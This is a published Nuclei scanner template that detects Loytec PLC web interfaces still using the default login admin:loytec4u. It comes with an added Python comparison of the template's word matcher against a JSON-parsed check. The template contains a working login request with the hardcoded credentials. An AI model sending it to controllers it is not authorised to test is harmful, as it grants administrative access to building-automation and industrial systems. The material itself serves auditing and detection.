Identified Loytec PLC web interfaces that were accessible using default credentials (admin:loytec4u). These devices were commonly deployed in building automation and industrial control environments. When left unchanged, default credentials could have allowed unauthorized users to gain administrative access to the system.
PoC code [public]
```yaml
id: loytec-default-password

info:
  name: Loytec PLC - Default Login
  author: biero-el-corridor
  severity: high
  description: |
    Identified Loytec PLC web interfaces that were accessible using default credentials (admin:loytec4u). These devices were commonly deployed in building automation and industrial control environments. When left unchanged, default credentials could have allowed unauthorized users to gain administrative access to the system.
  metadata:
    verifed: true
    max-request: 1
  tags: loytec,default-login,vuln

variables:
  username: admin
  password: loytec4u

http:
  - raw:
      - |
        POST /webui/login HTTP/1.1
        Host: {{Hostname}}
        X-Create-Session: 1
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&login=Login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"sessUser":"admin"'
          - '"loggedIn":true'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5d95a523c26fa85d9a074afd30340b4198cf32401240fce77135c87d14f309b02206fb0dd6139abb8b33044601c639e4ab3532f469684db96f3f60012f44a2cd1ca:922c64590222798bb761d5b6d8e72950
```
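Added example (not part of the published template or the vendor's code): the template's matcher logic reproduced in Python next to a JSON-parsed variant, run over constructed response bodies so that anyone triaging results from their own inventory can see when the literal word match and the parsed check disagree. It assumes the login response is a JSON object with `sessUser` and `loggedIn` as top-level keys; the function names and sample bodies are hypothetical.

```python
import json

# Matcher words and status copied from the template above.
WORDS = ['"sessUser":"admin"', '"loggedIn":true']
STATUS = 200


def template_match(status: int, body: str) -> bool:
    """matchers-condition: and -> status matcher AND word matcher (condition: and)."""
    return status == STATUS and all(word in body for word in WORDS)


def parsed_match(status: int, body: str) -> bool:
    """Same decision on parsed JSON, so spacing and key order do not matter."""
    if status != STATUS:
        return False
    try:
        doc = json.loads(body)
    except ValueError:  # not JSON at all, e.g. an HTML login page
        return False
    return (isinstance(doc, dict)
            and doc.get("sessUser") == "admin"
            and doc.get("loggedIn") is True)


# Constructed responses (assumed shape, not captured from a device).
SAMPLES = {
    "default login accepted": (200, '{"sessUser":"admin","loggedIn":true}'),
    "accepted, spaced JSON": (200, '{"sessUser": "admin", "loggedIn": true}'),
    "login rejected": (200, '{"sessUser":"","loggedIn":false}'),
    "wrong status": (401, '{"sessUser":"admin","loggedIn":true}'),
    "not JSON": (200, "<html>Login</html>"),
}


def compare() -> dict:
    """Return {sample name: (template_match, parsed_match)} for every sample."""
    return {name: (template_match(s, b), parsed_match(s, b))
            for name, (s, b) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (by_words, by_json) in compare().items():
        print(f"{name:24} words={by_words!s:5} parsed={by_json}")
```

The "spaced JSON" sample is the case to watch: a response that serialises the same fields with whitespace would be missed by the literal word match, so a clean scan result alone does not prove the default password was changed.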